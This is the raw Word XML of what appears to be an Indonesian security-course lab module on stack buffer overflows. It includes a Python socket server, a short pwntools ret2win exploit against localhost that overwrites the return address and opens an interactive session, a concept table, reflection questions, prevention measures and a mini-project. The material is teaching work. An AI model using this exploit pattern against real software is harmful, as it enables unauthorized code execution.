          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Simulasi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE715C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Server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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF9358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from socket import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E243DEF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68CA30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s = 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socket(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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422152D4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s.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(("0.0.0.0", 9001))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13735C1F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s.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1C137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7E3E6A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conn,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s.accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1D68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conn.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DD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b"Input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:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE01C4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conn.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C266DA7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8C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19499B61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Exploit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pwntools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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA8785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pwn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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558DC465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B430AE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p = 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remote(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>"localhost", 9001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC62D2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27E370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payload =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b"A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"*40 + p64(0x401146)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284D0EAA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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F385478" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00C4774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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D48BA" w14:textId="3AC8EC2C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ABC5D6" w14:textId="661F67E6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8C5D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18"/>
        <w:gridCol w:w="4162"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w14:paraId="607A6008" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D17A68" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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5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Konsep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A51D58D" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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C5D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8C5DDC" w:rsidRPr="008C5DDC" w14:paraId="207A22A9" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C2FCA1" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Buffer Overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406291A4" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Overwrite memory di stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w14:paraId="122ECDFF" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08907E52" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Return Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A4AC9DC" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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DDC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Alamat </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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</w:tr>
      <w:tr w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w14:paraId="6DB81DAF" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28A177A5" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5577BDC5" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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DDC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Jarak buffer </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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 xml:space="preserve"> RIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w14:paraId="37BD5EF6" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B57AAB9" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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ret2win</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3D67A0" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Mengarahkan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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eksekusi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:tr>
      <w:tr w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w14:paraId="1C7C08F0" w14:textId="77777777" w:rsidTr="00C47742">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F0C454" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5D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Shellcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DA8B6DE" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5DDC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5DDC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C5DDC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> spawn shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D6FB20F" w14:textId="10FC2893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0EBF3F" w14:textId="74871372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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Refleksi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D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4DCB868A" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F52DE2" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr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stack frame?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDF119" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr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ASLR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dimatikan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lab?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26471630" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr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ret2win dan shellcode injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AFB91" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr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buffer overflow?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01B221" w14:textId="6FF70143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1B8EA1" w14:textId="614475B1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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cara </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pencegahan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="643B8CE1" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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C5DDC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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B987E23" w14:textId="55441362" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Aktifkan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:</w:t>
      </w:r>
      <w:r w:rsidR="00C477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2BDBDC" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00C47742">
      <w:pPr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lastRenderedPageBreak/>
        <w:t>Stack canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E43EA" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00C47742">
      <w:pPr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NX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA03C4D" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00C47742">
      <w:pPr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PIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51363D13" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00C47742">
      <w:pPr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ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1D958" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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compiler modern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proteksi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="158BDDD6" w14:textId="72A30912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CA1E8E" w14:textId="5B7FBF4D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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mini Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202EFD3" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="008C5DDC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Buat binary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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B73B02" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E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>Login password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F8EE5" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E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5DD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hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9D8DB" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E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Compile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proteksi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61013873" w14:textId="77777777" w:rsidR="008C5DDC" w:rsidRPr="008C5DDC" w:rsidRDefault="008C5DDC" w:rsidP="00523D1E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5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Buat exploit Python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DDC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8C5DDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92CAF0" w14:textId="6ED7EABC" w:rsid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51938" w14:textId="17B55AFA" w:rsidR="0055400D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FF660" w14:textId="194B7447" w:rsidR="0055400D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B8927E" w14:textId="77777777" w:rsidR="0055400D" w:rsidRPr="0098435F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5400D" w:rsidRPr="0098435F" w:rsidSect="00DD0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05FB4" w14:textId="77777777" w:rsidR="002E1018" w:rsidRDefault="002E1018" w:rsidP="00DD027E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3D37F683" w14:textId="77777777" w:rsidR="002E1018" w:rsidRDefault="002E1018" w:rsidP="00DD0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02440" w14:textId="77777777" w:rsidR="00A31493" w:rsidRDefault="00A314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45054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12E5378F" w14:textId="31635872" w:rsidR="00DD027E" w:rsidRPr="00DD027E" w:rsidRDefault="00DD027E" w:rsidP="00DD027E">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:pBdr>
            <w:top w:val="single" w:sz="12" w:space="1" w:color="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
          </w:pBdr>
          <w:jc w:val="center"/>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="00DD027E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00DD027E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00DD027E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00DD027E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00DD027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240CE4A" w14:textId="77777777" w:rsidR="00DD027E" w:rsidRDefault="00DD02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903E" w14:textId="77777777" w:rsidR="00A31493" w:rsidRDefault="00A314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32FBD" w14:textId="77777777" w:rsidR="002E1018" w:rsidRDefault="002E1018" w:rsidP="00DD027E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61EB7335" w14:textId="77777777" w:rsidR="002E1018" w:rsidRDefault="002E1018" w:rsidP="00DD0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EC419" w14:textId="1D3ED56F" w:rsidR="00A31493" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="0E8EC9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6" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:424.95pt;height:466.7pt;z-index:-251657216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EF1B" w14:textId="16CAC855" w:rsidR="00A31493" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="7C742D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7" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:424.95pt;height:466.7pt;z-index:-251656192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519C" w14:textId="74EE4AED" w:rsidR="00A31493" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:pict w14:anchorId="74BD4C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5" o:spid="_x0000_s1025" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:424.95pt;height:466.7pt;z-index:-251658240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982"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9683C0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F06B96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9043D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1BAA5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C4881"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="738E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85028"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B784D7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B4F27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89FAB1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E5448"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10A6F0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19C5DA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2FE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10D2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3082F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27D57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37116019">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1429152652">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1987852990">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1371296882">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1184244385">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="381053266">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1118989569">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1216548315">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1039941708">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1383864603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7E"/>
    <w:rsid w:val="000545AF"/>
    <w:rsid w:val="000C7018"/>
    <w:rsid w:val="00144A62"/>
    <w:rsid w:val="00183197"/>
    <w:rsid w:val="00202025"/>
    <w:rsid w:val="002E1018"/>
    <w:rsid w:val="002F4612"/>
    <w:rsid w:val="003F2A2A"/>
    <w:rsid w:val="00473728"/>
    <w:rsid w:val="004C4747"/>
    <w:rsid w:val="004D1211"/>
    <w:rsid w:val="004E4E81"/>
    <w:rsid w:val="00523D1E"/>
    <w:rsid w:val="0055400D"/>
    <w:rsid w:val="00582C1D"/>
    <w:rsid w:val="00684925"/>
    <w:rsid w:val="007442AE"/>
    <w:rsid w:val="008C5DDC"/>
    <w:rsid w:val="0098435F"/>
    <w:rsid w:val="009C665D"/>
    <w:rsid w:val="00A31493"/>
    <w:rsid w:val="00A83DE4"/>
    <w:rsid w:val="00AC31BD"/>
    <w:rsid w:val="00AE478C"/>
    <w:rsid w:val="00B26D7A"/>
    <w:rsid w:val="00B974DC"/>
    <w:rsid w:val="00C45724"/>
    <w:rsid w:val="00C47742"/>
    <w:rsid w:val="00C8051F"/>
    <w:rsid w:val="00D145BE"/>
    <w:rsid w:val="00D73341"/>
    <w:rsid w:val="00D76CDC"/>
    <w:rsid w:val="00DD027E"/>
    <w:rsid w:val="00DE16B0"/>
    <w:rsid w:val="00E06FE8"/>
    <w:rsid w:val="00E827F9"/>
    <w:rsid w:val="00E9065C"/>
    <w:rsid w:val="00F1329B"/>
    <w:rsid w:val="00F51FDE"/>
    <w:rsid w:val="00F816E7"/>
    <w:rsid w:val="00FB0BE8"/>
    <w:rsid w:val="00FD4FD8"/>
    <w:rsid w:val="00FE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610CAB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2829ECA4-588B-439F-9812-71F825EA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7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D02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27E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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35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7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7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9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1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7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35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7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9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2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8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0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6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94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7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1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4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3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6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0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1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8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8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7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9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5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4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2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3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7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6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1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1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4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8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2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1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3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6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2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8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0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6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8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3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3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6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4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6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HP2025-100REV</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HP2025-25REV</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-19T09:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-20T22:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>